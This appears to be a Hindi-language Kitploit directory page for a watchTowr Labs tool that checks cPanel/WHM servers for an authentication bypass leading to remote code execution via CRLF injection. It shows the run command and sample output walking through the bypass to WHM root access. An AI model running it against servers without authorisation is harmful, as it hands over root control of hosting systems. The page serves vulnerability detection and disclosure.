Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py — पहचान आर्टिफैक्ट जनरेटर जो cPanel/WHM प्रमाणीकरण बायपास (CVE-2026-41940) को सत्यापित करता है और CRLF इंजेक्शन के माध्यम से RCE प्रदर्शित करता है, जो WHM व्यवस्थापक इंटरफ़ेस को लक्षित करता है। | Kitploit
उपकरण/GitHubGitHub/watchtowrlabs/watchtowr-vs-cpanel-whm-authbypass-to-rce.py
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubwatchtowrlabs/watchtowr-vs-cpanel-whm-authbypass-to-rce.py

watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

पहचान आर्टिफैक्ट जनरेटर जो cPanel/WHM प्रमाणीकरण बायपास (CVE-2026-41940) को सत्यापित करता है और CRLF इंजेक्शन के माध्यम से RCE प्रदर्शित करता है, जो WHM व्यवस्थापक इंटरफ़ेस को लक्षित करता है।

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
4161023 महीने पहलेKitploit द्वारा समीक्षित

cve-2026-41940 cPanel/WHM प्रमाणीकरण बायपास - डिटेक्शन आर्टिफैक्ट जनरेटर

cPanel/WHM प्रमाणीकरण बायपास डिटेक्शन आर्टिफैक्ट जनरेटर टूल

विवरण

यह डिटेक्शन आर्टिफैक्ट जनरेटर सत्यापित करता है कि cPanel/WHM एक हालिया प्रमाणीकरण बायपास के प्रति संवेदनशील है या नहीं।

कार्रवाई में डिटेक्शन

एक संवेदनशील इंस्टेंस के विरुद्ध परीक्षण करें:

root@kitploit:~
python authbypass-RCE.py --target https://target:2087/ 
                     __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                          \/          \/     \/

        watchTowr-vs-cPanel-WHM-AuthBypass-to-RCE.py

        (*) cPanel/WHM Authentication Bypass - Detection Artifact Generator

          - Sina Kheirkhah (@SinSinology) of watchTowr (@watchTowrcyber)

        CVEs: [CVE-2026-Pending]

[0] hostname = 
[1] minting a preauth session...
    session base = :vQ2WC5Bexp0oFSa7
[2] sending the CRLF injection (Basic auth + no-ob cookie)...
    HTTP 307, leaked token = /cpsess5691070609
[3] firing do_token_denied to propagate raw -> cache...
    HTTP 401, gadget fired
[4] verifying we're WHM root...
    /json-api/version -> HTTP 200  {"version":"11.110.0.89"}

प्रभावित संस्करण

cPanel वेबसाइट यहाँ देखें

watchTowr Labs का अनुसरण करें

नवीनतम सुरक्षा अनुसंधान के लिए watchTowr Labs टीम का अनुसरण करें

  • https://labs.watchtowr.com/

  • https://x.com/watchtowrcyber

टूल डाउनलोड करें